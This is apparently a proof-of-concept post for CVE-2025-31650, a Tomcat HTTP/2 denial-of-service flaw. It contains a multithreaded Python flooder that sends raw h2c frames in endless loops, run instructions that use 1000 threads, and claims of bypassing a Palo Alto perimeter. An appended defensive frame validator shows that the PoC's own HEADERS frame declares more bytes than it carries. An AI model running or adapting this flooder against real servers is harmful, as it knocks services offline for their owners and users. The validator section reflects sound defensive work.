CVE-2025-31650 (Apache Tomcat HTTP/2 DoS) POC

```python
import socket
import argparse
import threading
import time

def exploit(target, port):
    try:
        # Raw payload for HTTP/2 h2c (cleartext) handshake and frame manipulation
        payload = (
            b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"        # client connection preface
            b"\x00\x00\x00\x04\x00\x00\x00\x00\x00"     # SETTINGS frame (empty, stream 0)
            b"\x00\x00\x10\x01\x05\x00\x00\x00\x01"     # HEADERS frame (END_STREAM|END_HEADERS, stream 1)
            b"\x82\x86\x84\x41\x8a\x08\x9d\x5c\x0b\x81\x70\xdc\x7c\x4e\xed"  # HPACK header block
        )

        while True:
            # Each iteration opens a fresh connection and sends the preface plus frames;
            # the with-block closes the socket on exit, so the loop reconnects continuously
            # and the server keeps receiving new requests.
            with socket.create_connection((target, port), timeout=5) as sock:
                sock.sendall(payload)
    except OSError:
        # Connection refused / reset / timeout: let this thread end quietly
        pass

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--target", required=True)
    parser.add_argument("--port", type=int, default=9090)
    parser.add_argument("--threads", type=int, default=100)
    args = parser.parse_args()

    print(f"[*] Target: {args.target}:{args.port} | Threads: {args.threads}")
    print("[*] Triggering memory leak... Press Ctrl+C to stop")

    for _ in range(args.threads):
        threading.Thread(target=exploit, args=(args.target, args.port), daemon=True).start()

    try:
        # Keep the main thread alive without busy-looping; Ctrl+C ends the daemon threads
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[*] Stopped.")
```

Reproduction Steps & Bypass Context:

  • Target Environment: The condition was verified against an Apache Tomcat v10.1.33 server with HTTP/2 (h2c) support enabled.
  • Bypass / Exploit Mechanics: The vulnerability leverages continuous and sequential HTTP/2 packets containing manipulated HEADERS frames. The Palo Alto inspection engine currently allows these specific, unauthenticated HTTP/2 upgrade requests to pass through to the backend without dropping the malicious frames.
  • Impact Verification: Once the payload bypasses the perimeter, the server fails to free RAM efficiently, triggering a severe memory leak. During execution, memory consumption spikes rapidly from a stable baseline of 150-170 MB up to 1.5 GB, overloading the Garbage Collection mechanism and causing a complete Denial of Service (DoS).

PoC Execution Instructions: To replicate this bypass and memory exhaustion, deploy a vulnerable Tomcat instance and run the provided Python script. We utilized 1000 threads during our verification to consistently trigger the condition (e.g., python3 poc.py --target <IP> --port 9090 --threads 1000).
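As an added example (not part of the original PoC or of any vendor product), the kind of structural check a perimeter inspection engine or IDS rule could apply to h2c traffic before forwarding it: it parses the client connection preface and the frames that follow and reports violations such as a first frame that is not SETTINGS, SETTINGS or HEADERS on the wrong stream, or a frame whose declared length exceeds the bytes actually present. The sample byte strings are constructed for the demonstration.

```python
# Added example (not from the original PoC): a minimal HTTP/2 (h2c) frame-stream
# validator. Frame layout per RFC 7540 section 4.1: 24-bit length, 8-bit type,
# 8-bit flags, 31-bit stream identifier, then the payload. Samples are constructed.
import struct

PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
SETTINGS, HEADERS = 0x4, 0x1
FRAME_NAMES = {0x0: "DATA", 0x1: "HEADERS", 0x2: "PRIORITY", 0x4: "SETTINGS", 0x6: "PING", 0x7: "GOAWAY"}


def parse_frames(raw):
    """Return (frames, findings). frames: list of (type, flags, stream_id, payload);
    findings: human-readable protocol violations (an empty list means well-formed)."""
    findings, frames = [], []
    if not raw.startswith(PREFACE):
        return frames, ["missing or malformed client connection preface"]
    buf, off, first = raw[len(PREFACE):], 0, True
    while off < len(buf):
        if len(buf) - off < 9:
            findings.append(f"truncated frame header at offset {off}")
            break
        length = int.from_bytes(buf[off:off + 3], "big")
        ftype, flags = buf[off + 3], buf[off + 4]
        stream_id = struct.unpack(">I", buf[off + 5:off + 9])[0] & 0x7FFFFFFF
        name = FRAME_NAMES.get(ftype, f"type 0x{ftype:02x}")
        payload = buf[off + 9:off + 9 + length]
        if len(payload) < length:
            findings.append(f"{name} declares {length} payload bytes but only {len(payload)} follow")
            break
        if first and ftype != SETTINGS:
            findings.append(f"first frame after preface is {name}, not SETTINGS")
        if ftype == SETTINGS and stream_id != 0:
            findings.append(f"SETTINGS on stream {stream_id} (must be stream 0)")
        if ftype == HEADERS and stream_id == 0:
            findings.append("HEADERS on stream 0 (connection error per RFC 7540)")
        frames.append((ftype, flags, stream_id, payload))
        first, off = False, off + 9 + length
    return frames, findings


# Constructed samples: a well-formed GET (HPACK static indexes :method GET, :scheme http,
# :path /) and a stream whose HEADERS frame declares more bytes than it carries, which a
# strict inspector would drop rather than forward to the backend.
GOOD = (PREFACE + b"\x00\x00\x00\x04\x00\x00\x00\x00\x00"
        + b"\x00\x00\x03\x01\x05\x00\x00\x00\x01" + b"\x82\x86\x84")
BAD = (PREFACE + b"\x00\x00\x00\x04\x00\x00\x00\x00\x00"
       + b"\x00\x00\x10\x01\x05\x00\x00\x00\x01" + b"\x82\x86\x84")

if __name__ == "__main__":
    for label, sample in (("good", GOOD), ("bad", BAD)):
        frames, findings = parse_frames(sample)
        print(label, len(frames), "frames parsed;", findings or "no findings")
```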

https://nvd.nist.gov/vuln/detail/CVE-2025-31650
